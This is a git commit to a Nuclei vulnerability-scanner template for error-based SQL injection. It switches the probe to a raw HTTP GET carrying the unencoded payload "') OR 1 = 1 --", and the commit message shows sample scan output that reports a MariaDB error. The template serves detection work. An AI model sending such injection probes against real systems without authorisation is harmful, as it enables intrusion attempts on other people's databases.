Update error-based-sql-injection.yaml
Reverting back to raw http request. Sending encoded requests using net/http were missing blatant SQL injections. Before: [INF] Loading templates... [INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high] [INF] Loading workflows... [INF] Using 1 rules (1 templates, 0 workflows) [INF] No results found. Better luck next time! After: [INF] Loading templates... [INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high] [INF] Loading workflows... [INF] Using 1 rules (1 templates, 0 workflows) [2021-03-20 14:48:59] [error-based-sql-injection:MariaDB] [http] [high] https://REDACTED/') [check the manual that corresponds to your MariaDB server version]patch-1
parent
ea0f3a2f48
commit
a3d7047521
|
@ -8,12 +8,13 @@ info:
|
||||||
tags: sqli
|
tags: sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |+
|
||||||
- "{{BaseURL}}/') OR 1 = 1 -- ];"
|
GET /') OR 1 = 1 -- ];
|
||||||
|
Host: {{Hostname}}
|
||||||
# Nuclei's use of net/http here will automatically encode the payload, thus sending {{BaseURL}}/%27%29%20OR%201%20=%201%20--%20%5D; as the request
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
# In order to send an unencoded payload, you'll have to make use of the rawhttp library by crafting a raw HTTP request
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
Loading…
Reference in New Issue